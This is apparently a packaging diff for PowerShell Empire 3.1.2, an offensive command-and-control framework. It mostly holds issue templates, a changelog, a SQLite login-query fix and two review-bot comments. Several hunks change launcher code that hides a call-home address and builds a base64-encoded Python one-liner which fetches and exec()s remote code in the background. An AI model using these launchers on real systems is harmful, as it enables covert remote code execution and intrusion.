Codebase list powershell-empire / e2905aa
New upstream version 3.1.2 Sophie Brun 4 years ago
9 changed file(s) with 99 addition(s) and 7 deletion(s).
0 # These are supported funding model platforms
1
2 github: [bc-security]
0 ---
1 name: Bug report
2 about: Create a report to help us improve
3 title: "[BUG]"
4 labels: bug
5 assignees: ''
6
7 ---
8
9 **Empire Version**
10 - Empire 3.x
11
12 **OS Information (Linux flavor, Python version)**
13 - OS:
14 - Python:
15
16 **Describe the bug**
17 A clear and concise description of what the bug is.
18
19 **To Reproduce**
20 Steps to reproduce the behavior:
21 1. Go to '...'
22 2. Click on '....'
23 3. Scroll down to '....'
24 4. See error
25
26 **Expected behavior**
27 A clear and concise description of what you expected to happen.
28
29 **Screenshots**
30 If applicable, add screenshots to help explain your problem.
31
32 **Additional context**
33 Add any other context about the problem here.
0 ---
1 name: Feature request
2 about: Suggest an idea for this project
3 title: "[FEATURE REQUEST]"
4 labels: enhancement
5 assignees: ''
6
7 ---
8
9 **Is your feature request related to a problem? Please describe.**
10 A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
11
12 **Describe the solution you'd like**
13 A clear and concise description of what you want to happen.
14
15 **Describe alternatives you've considered**
16 A clear and concise description of any alternative solutions or features you've considered.
17
18 **Additional context**
19 Add any other context or screenshots about the feature request here.
0 # Comment that will be sent if an issue is judged to be closed
1 comment: "This issue is closed because it does not meet our issue template. Please resubmit with the correct template."
2 issueConfigs:
3 # There can be several configs for different kind of issues.
4 - content:
5 # Example 1: bug report
6 - "Empire Version"
7 - "OS Information (Linux flavor, Python version)"
8 - "Describe the bug"
9 - "To Reproduce"
10 - "Expected behavior"
11 - "Screenshots"
12 - "Additional context"
13
14 - content:
15 # Example 2: feature request
16 - "Is your feature request related to a problem? Please describe."
17 - "Describe the solution you'd like"
18 - "Describe alternatives you've considered"
19 - "Additional context"
20
21 - content:
22 # Example 3: fall back
23 - "Empire Version"
24 - "OS Information (Linux flavor, Python version)"
25 - "Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better."
26 - "Screenshot of error, embedded text output, or Pastebin link to the error"
27 - "Any additional information"
0 3.1.1
0 3.1.2
0 3/13/2020
1 ------------
2 - Version 3.1.2 Master Release
3 - Fixed REST login error 500 on some version of SQLite - #120 (@justsly)
4 - Fixed generate launcher bug for redirector listener - #125 (@RedBulletTooling)
5
06 3/8/2020
7 ------------
18 - Version 3.1.1 Master Release
29 - Updated the /me endpoint that was added in 3.1.0 to return the full user object (@Vinnybod)
310 - Updated install script for Kali Powershell install - #118 (@Vinnybod)
1414 from builtins import str
1515 from builtins import range
1616
17 VERSION = "3.1.1 BC-Security Fork"
17 VERSION = "3.1.2 BC-Security Fork"
1818
1919 from pydispatch import dispatcher
2020
107107 try:
108108 self.lock.acquire()
109109 cur = conn.cursor()
110 user = cur.execute("SELECT password from users WHERE username = ? AND enabled = true LIMIT 1", (user_name,)).fetchone()
110 user = cur.execute("SELECT password from users WHERE username = ? AND enabled = 1 LIMIT 1", (user_name,)).fetchone()
111111
112112 if user == None:
113113 return None
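Review bot: The switch to `enabled = 1` in the login query has no comment explaining why the boolean keyword cannot be used, so a later tidy-up could bring back the HTTP 500 on login that the changelog attributes to some SQLite versions. I would add `# SQLite before 3.23.0 has no TRUE/FALSE keywords; compare against the integer 1` above the `cur.execute` call, and check the rest of this file for other `= true` / `= false` comparisons, which are not visible in this section. The query stays parameterized on `username`, which is right for an authentication path. Separately, `if user == None:` reads better as `if user is None:`. The enclosing method starts and ends outside the visible lines, so the lock release cannot be reviewed here.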
194194
195195 # prebuild the request routing packet for the launcher
196196 routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL', meta='STAGE0', additional='None', encData='')
197 b64RoutingPacket = base64.b64encode(routingPacket)
197 b64RoutingPacket = base64.b64encode(routingPacket).decode("utf-8")
198198
199199 #stager += "$ser="+helpers.obfuscate_call_home_address(host)+";$t='"+stage0+"';"
200 stager += "$ser='%s';$t='%s';$hop='%s';" % (helpers.obfuscate_call_home_address(host), stage0, listenerName)
200 stager += "$ser=%s;$t='%s';$hop='%s';" % (helpers.obfuscate_call_home_address(host), stage0, listenerName)
201201
202202 #Add custom headers if any
203203 if customHeaders != []:
263263
264264 # prebuild the request routing packet for the launcher
265265 routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON', meta='STAGE0', additional='None', encData='')
266 b64RoutingPacket = base64.b64encode(routingPacket)
266 b64RoutingPacket = base64.b64encode(routingPacket).decode("utf-8")
267267
268268 launcherBase += "req=urllib2.Request(server+t);\n"
269269 # add the RC4 packet to a cookie
324324 launcherBase += "exec(''.join(out))"
325325
326326 if encode:
327 launchEncoded = base64.b64encode(launcherBase)
327 launchEncoded = base64.b64encode(launcherBase).decode("utf-8")
328328 launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | /usr/bin/python &" % (launchEncoded)
329329 return launcher
330330 else:
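Review bot: Dropping the quotes in `$ser=%s;` makes the generated assignment depend on what `helpers.obfuscate_call_home_address(host)` returns, presumably a complete, already-quoted expression, and nothing near the line says so. I would state that contract in a comment, e.g. `# obfuscate_call_home_address() returns a full expression including its own quoting, so no quotes around %s`, and delete the stale commented-out `#stager += ...` line just above it, which shows a third variant of the same statement. The three `b64encode(...).decode("utf-8")` changes in this section would likewise benefit from a one-line comment that the value is a `str` from that point on. The enclosing functions start and end outside the visible hunks.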